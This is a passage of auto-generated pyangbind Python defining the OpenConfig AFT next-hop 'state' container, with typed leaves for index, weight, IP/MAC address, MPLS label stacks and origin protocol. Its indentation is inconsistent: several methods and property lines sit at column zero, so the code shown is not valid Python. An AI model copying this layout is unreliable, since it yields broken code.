            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=False,
        )
index = __builtin__.property(_get_index)
weight = __builtin__.property(_get_weight)
ip_address = __builtin__.property(_get_ip_address)
mac_address = __builtin__.property(_get_mac_address)
popped_mpls_label_stack = __builtin__.property(_get_popped_mpls_label_stack)
pushed_mpls_label_stack = __builtin__.property(_get_pushed_mpls_label_stack)
decapsulate_header = __builtin__.property(_get_decapsulate_header)
encapsulate_header = __builtin__.property(_get_encapsulate_header)
origin_protocol = __builtin__.property(_get_origin_protocol)
_pyangbind_elements = OrderedDict(
[
("index", index),
("weight", weight),
("ip_address", ip_address),
("mac_address", mac_address),
("popped_mpls_label_stack", popped_mpls_label_stack),
("pushed_mpls_label_stack", pushed_mpls_label_stack),
("decapsulate_header", decapsulate_header),
("encapsulate_header", encapsulate_header),
("origin_protocol", origin_protocol),
]
)
class state(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/afts/aft/entries/entry/next-hops/next-hop/state. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.

    YANG Description: Operational state parameters relating to the AFT
    next-hop entry
    """

    # __slots__ pins the instance attribute set - one mangled private slot per
    # YANG leaf plus the pyangbind bookkeeping attributes - avoiding a
    # per-instance __dict__.
    __slots__ = (
        "_path_helper",
        "_extmethods",
        "__index",
        "__weight",
        "__ip_address",
        "__mac_address",
        "__popped_mpls_label_stack",
        "__pushed_mpls_label_stack",
        "__decapsulate_header",
        "__encapsulate_header",
        "__origin_protocol",
    )

    _yang_name = "state"  # YANG node name of this container
    _pybind_generated_by = "container"  # marker left by the pyangbind generator
    def __init__(self, *args, **kwargs):
        """Initialise every leaf of the container to a default YANGDynClass
        wrapper; if a single positional argument is supplied, copy each of its
        changed elements into this object via the matching _set_* method."""
        self._path_helper = False
        self._extmethods = False
        # index: uint64 - a unique entry for the next-hop.
        self.__index = YANGDynClass(
            base=RestrictedClassType(
                base_type=long,
                restriction_dict={"range": ["0..18446744073709551615"]},
                int_size=64,
            ),
            is_leaf=True,
            yang_name="index",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint64",
            is_config=False,
        )
        # weight: uint32 - relative load-balancing weight of the next-hop.
        self.__weight = YANGDynClass(
            base=RestrictedClassType(
                base_type=long,
                restriction_dict={"range": ["0..4294967295"]},
                int_size=32,
            ),
            is_leaf=True,
            yang_name="weight",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint32",
            is_config=False,
        )
        # ip-address: union of zone-free IPv4 and IPv6 address patterns.
        self.__ip_address = YANGDynClass(
            base=[
                RestrictedClassType(
                    base_type=RestrictedClassType(
                        base_type=six.text_type,
                        restriction_dict={
                            "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
                        },
                    ),
                    restriction_dict={"pattern": "[0-9\\.]*"},
                ),
                RestrictedClassType(
                    base_type=RestrictedClassType(
                        base_type=six.text_type,
                        restriction_dict={
                            "pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
                        },
                    ),
                    restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
                ),
            ],
            is_leaf=True,
            yang_name="ip-address",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="inet:ip-address-no-zone",
            is_config=False,
        )
        # mac-address: colon-separated IEEE MAC address (yang:mac-address).
        self.__mac_address = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
            ),
            is_leaf=True,
            yang_name="mac-address",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="yang:mac-address",
            is_config=False,
        )
        # popped-mpls-label-stack: leaf-list of numeric (16..1048575) or named
        # reserved MPLS labels.
        self.__popped_mpls_label_stack = YANGDynClass(
            base=TypedListType(
                allowed_type=[
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=long,
                            restriction_dict={"range": ["0..4294967295"]},
                            int_size=32,
                        ),
                        restriction_dict={"range": ["16..1048575"]},
                    ),
                    RestrictedClassType(
                        base_type=six.text_type,
                        restriction_type="dict_key",
                        restriction_arg={
                            "IPV4_EXPLICIT_NULL": {"value": 0},
                            "ROUTER_ALERT": {"value": 1},
                            "IPV6_EXPLICIT_NULL": {"value": 2},
                            "IMPLICIT_NULL": {"value": 3},
                            "ENTROPY_LABEL_INDICATOR": {"value": 7},
                            "NO_LABEL": {},
                        },
                    ),
                ]
            ),
            is_leaf=False,
            yang_name="popped-mpls-label-stack",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-mplst:mpls-label",
            is_config=False,
        )
        # pushed-mpls-label-stack: same label type as the popped stack.
        self.__pushed_mpls_label_stack = YANGDynClass(
            base=TypedListType(
                allowed_type=[
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=long,
                            restriction_dict={"range": ["0..4294967295"]},
                            int_size=32,
                        ),
                        restriction_dict={"range": ["16..1048575"]},
                    ),
                    RestrictedClassType(
                        base_type=six.text_type,
                        restriction_type="dict_key",
                        restriction_arg={
                            "IPV4_EXPLICIT_NULL": {"value": 0},
                            "ROUTER_ALERT": {"value": 1},
                            "IPV6_EXPLICIT_NULL": {"value": 2},
                            "IMPLICIT_NULL": {"value": 3},
                            "ENTROPY_LABEL_INDICATOR": {"value": 7},
                            "NO_LABEL": {},
                        },
                    ),
                ]
            ),
            is_leaf=False,
            yang_name="pushed-mpls-label-stack",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-mplst:mpls-label",
            is_config=False,
        )
        # decapsulate-header: enumerated encapsulation header type to remove.
        self.__decapsulate_header = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
            ),
            is_leaf=True,
            yang_name="decapsulate-header",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-aftt:encapsulation-header-type",
            is_config=False,
        )
        # encapsulate-header: enumerated encapsulation header type to add.
        self.__encapsulate_header = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
            ),
            is_leaf=True,
            yang_name="encapsulate-header",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-aftt:encapsulation-header-type",
            is_config=False,
        )
        # origin-protocol: identityref to an openconfig-policy-types install
        # protocol identity; unprefixed and prefixed forms are accepted.
        self.__origin_protocol = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "BGP": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:BGP": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:BGP": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "ISIS": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:ISIS": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:ISIS": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "OSPF": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:OSPF": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:OSPF": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "OSPF3": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:OSPF3": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:OSPF3": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "STATIC": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:STATIC": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:STATIC": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "DIRECTLY_CONNECTED": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:DIRECTLY_CONNECTED": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:DIRECTLY_CONNECTED": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "LOCAL_AGGREGATE": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:LOCAL_AGGREGATE": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:LOCAL_AGGREGATE": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                },
            ),
            is_leaf=True,
            yang_name="origin-protocol",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=False,
        )

        load = kwargs.pop("load", None)
        if args:
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            # Copy-construction: the supplied object must expose every element
            # of this container; only elements it has changed are copied in.
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"afts",
"aft",
"entries",
"entry",
"next-hops",
"next-hop",
"state",
]
def _get_index(self):
"""
Getter method for index, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/index (uint64)
YANG Description: A unique entry for the next-hop
"""
return self.__index
    def _set_index(self, v, load=False):
        """
        Setter method for index, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/index (uint64)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_index is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_index() directly.
        YANG Description: A unique entry for the next-hop
        """
        # If v is already a YANGDynClass wrapper, unwrap it to its underlying
        # type before revalidating it below.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # Validate v against the uint64 range.
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=long,
                    restriction_dict={"range": ["0..18446744073709551615"]},
                    int_size=64,
                ),
                is_leaf=True,
                yang_name="index",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="uint64",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Re-raise as a structured ValueError carrying the expected YANG
            # type, so callers can produce a meaningful error report.
            raise ValueError(
                {
                    "error-string": """index must be of a type compatible with uint64""",
                    "defined-type": "uint64",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=False)""",
                }
            )
        self.__index = t
        # Notify the parent object of the change, if supported.
        if hasattr(self, "_set"):
            self._set()
def _unset_index(self):
self.__index = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..18446744073709551615"]},
int_size=64,
),
is_leaf=True,
yang_name="index",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint64",
is_config=False,
)
def _get_weight(self):
"""
Getter method for weight, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/weight (uint32)
YANG Description: The weight of the next-hop. Traffic is balanced according to
the ratio described by the relative weights of the next hops
that exist for the AFT entry. Note that all next-hops that are
specified are assumed to be active next-hops and therefore
eligible (and selected) to be installed in the FIB, and hence
used for packet forwarding.
"""
return self.__weight
    def _set_weight(self, v, load=False):
        """
        Setter method for weight, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/weight (uint32)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_weight is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_weight() directly.
        YANG Description: The weight of the next-hop. Traffic is balanced according to
        the ratio described by the relative weights of the next hops
        that exist for the AFT entry. Note that all next-hops that are
        specified are assumed to be active next-hops and therefore
        eligible (and selected) to be installed in the FIB, and hence
        used for packet forwarding.
        """
        # If v is already a YANGDynClass wrapper, unwrap it to its underlying
        # type before revalidating it below.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # Validate v against the uint32 range.
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=long,
                    restriction_dict={"range": ["0..4294967295"]},
                    int_size=32,
                ),
                is_leaf=True,
                yang_name="weight",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="uint32",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Re-raise as a structured ValueError carrying the expected YANG
            # type, so callers can produce a meaningful error report.
            raise ValueError(
                {
                    "error-string": """weight must be of a type compatible with uint32""",
                    "defined-type": "uint32",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
                }
            )
        self.__weight = t
        # Notify the parent object of the change, if supported.
        if hasattr(self, "_set"):
            self._set()
def _unset_weight(self):
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_ip_address(self):
"""
Getter method for ip_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/ip_address (inet:ip-address-no-zone)
YANG Description: The IP address of the next-hop system.
"""
return self.__ip_address
    def _set_ip_address(self, v, load=False):
        """
        Setter method for ip_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/ip_address (inet:ip-address-no-zone)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_ip_address is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_ip_address() directly.
        YANG Description: The IP address of the next-hop system.
        """
        # Union-typed values carry a _utype hook; apply it so the validation
        # below sees the underlying native value.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # Re-wrap v under the IPv4 / IPv6 (no-zone) pattern union;
            # construction raises if v matches neither member.
            t = YANGDynClass(
                v,
                base=[
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=six.text_type,
                            restriction_dict={
                                "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
                            },
                        ),
                        restriction_dict={"pattern": "[0-9\\.]*"},
                    ),
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=six.text_type,
                            restriction_dict={
                                "pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
                            },
                        ),
                        restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
                    ),
                ],
                is_leaf=True,
                yang_name="ip-address",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="inet:ip-address-no-zone",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Surface a structured error naming the expected YANG type.
            raise ValueError(
                {
                    "error-string": """ip_address must be of a type compatible with inet:ip-address-no-zone""",
                    "defined-type": "inet:ip-address-no-zone",
                    "generated-type": """YANGDynClass(base=[RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}),RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}),], is_leaf=True, yang_name="ip-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ip-address-no-zone', is_config=False)""",
                }
            )
        self.__ip_address = t
        # Invoke the change hook when one is registered on this object.
        if hasattr(self, "_set"):
            self._set()
def _unset_ip_address(self):
self.__ip_address = YANGDynClass(
base=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
),
],
is_leaf=True,
yang_name="ip-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address-no-zone",
is_config=False,
)
def _get_mac_address(self):
"""
Getter method for mac_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/mac_address (yang:mac-address)
YANG Description: The MAC address of the next-hop if resolved by the local
network instance.
"""
return self.__mac_address
    def _set_mac_address(self, v, load=False):
        """
        Setter method for mac_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/mac_address (yang:mac-address)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_mac_address is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_mac_address() directly.
        YANG Description: The MAC address of the next-hop if resolved by the local
        network instance.
        """
        # Union-typed values carry a _utype hook; apply it so the validation
        # below sees the underlying native value.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # Re-wrap v under the colon-separated MAC pattern type;
            # construction raises if v does not match.
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
                ),
                is_leaf=True,
                yang_name="mac-address",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="yang:mac-address",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Surface a structured error naming the expected YANG type.
            raise ValueError(
                {
                    "error-string": """mac_address must be of a type compatible with yang:mac-address""",
                    "defined-type": "yang:mac-address",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'}), is_leaf=True, yang_name="mac-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:mac-address', is_config=False)""",
                }
            )
        self.__mac_address = t
        # Invoke the change hook when one is registered on this object.
        if hasattr(self, "_set"):
            self._set()
def _unset_mac_address(self):
self.__mac_address = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
),
is_leaf=True,
yang_name="mac-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:mac-address",
is_config=False,
)
def _get_popped_mpls_label_stack(self):
"""
Getter method for popped_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/popped_mpls_label_stack (oc-mplst:mpls-label)
YANG Description: The MPLS label stack to be popped from the packet when
switched by the system. The stack is encoding as a leaf-list
whereby the other of the entries is such that the first entry
is the label lowest down the label stack to be popped.
If the local system pops the outer-most label 400, then the
value of this list is [400,]. If the local system removes two
labels, the outer-most being 500, and the second of which is
500, then the value of the list is [500, 400].
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
return self.__popped_mpls_label_stack
    def _set_popped_mpls_label_stack(self, v, load=False):
        """
        Setter method for popped_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/popped_mpls_label_stack (oc-mplst:mpls-label)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_popped_mpls_label_stack is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_popped_mpls_label_stack() directly.
        YANG Description: The MPLS label stack to be popped from the packet when
        switched by the system. The stack is encoding as a leaf-list
        whereby the other of the entries is such that the first entry
        is the label lowest down the label stack to be popped.
        If the local system pops the outer-most label 400, then the
        value of this list is [400,]. If the local system removes two
        labels, the outer-most being 500, and the second of which is
        500, then the value of the list is [500, 400].
        A swap operation is reflected by entries in the
        popped-mpls-label-stack and pushed-mpls-label-stack nodes.
        """
        # Union-typed values carry a _utype hook; apply it so the validation
        # below sees the underlying native value.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # Each list member must be either a numeric label in 16..1048575
            # or one of the reserved/special label names.
            t = YANGDynClass(
                v,
                base=TypedListType(
                    allowed_type=[
                        RestrictedClassType(
                            base_type=RestrictedClassType(
                                base_type=long,
                                restriction_dict={"range": ["0..4294967295"]},
                                int_size=32,
                            ),
                            restriction_dict={"range": ["16..1048575"]},
                        ),
                        RestrictedClassType(
                            base_type=six.text_type,
                            restriction_type="dict_key",
                            restriction_arg={
                                "IPV4_EXPLICIT_NULL": {"value": 0},
                                "ROUTER_ALERT": {"value": 1},
                                "IPV6_EXPLICIT_NULL": {"value": 2},
                                "IMPLICIT_NULL": {"value": 3},
                                "ENTROPY_LABEL_INDICATOR": {"value": 7},
                                "NO_LABEL": {},
                            },
                        ),
                    ]
                ),
                is_leaf=False,
                yang_name="popped-mpls-label-stack",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="oc-mplst:mpls-label",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Surface a structured error naming the expected YANG type.
            raise ValueError(
                {
                    "error-string": """popped_mpls_label_stack must be of a type compatible with oc-mplst:mpls-label""",
                    "defined-type": "oc-mplst:mpls-label",
                    "generated-type": """YANGDynClass(base=TypedListType(allowed_type=[RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': ['16..1048575']}),RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4_EXPLICIT_NULL': {'value': 0}, 'ROUTER_ALERT': {'value': 1}, 'IPV6_EXPLICIT_NULL': {'value': 2}, 'IMPLICIT_NULL': {'value': 3}, 'ENTROPY_LABEL_INDICATOR': {'value': 7}, 'NO_LABEL': {}},),]), is_leaf=False, yang_name="popped-mpls-label-stack", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-mplst:mpls-label', is_config=False)""",
                }
            )
        self.__popped_mpls_label_stack = t
        # Invoke the change hook when one is registered on this object.
        if hasattr(self, "_set"):
            self._set()
def _unset_popped_mpls_label_stack(self):
self.__popped_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="popped-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
def _get_pushed_mpls_label_stack(self):
"""
Getter method for pushed_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/pushed_mpls_label_stack (oc-mplst:mpls-label)
YANG Description: The MPLS label stack imposed when forwarding packets to the
next-hop
- the stack is encoded as a leaf list whereby the order of the
entries is such that the first entry in the list is the
label at the bottom of the stack to be pushed.
To this end, a packet which is to forwarded to a device using
a service label of 42, and a transport label of 8072 will be
represented with a label stack list of [42, 8072].
The MPLS label stack list is ordered by the user, such that no
system re-ordering of leaves is permitted by the system.
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
return self.__pushed_mpls_label_stack
    def _set_pushed_mpls_label_stack(self, v, load=False):
        """
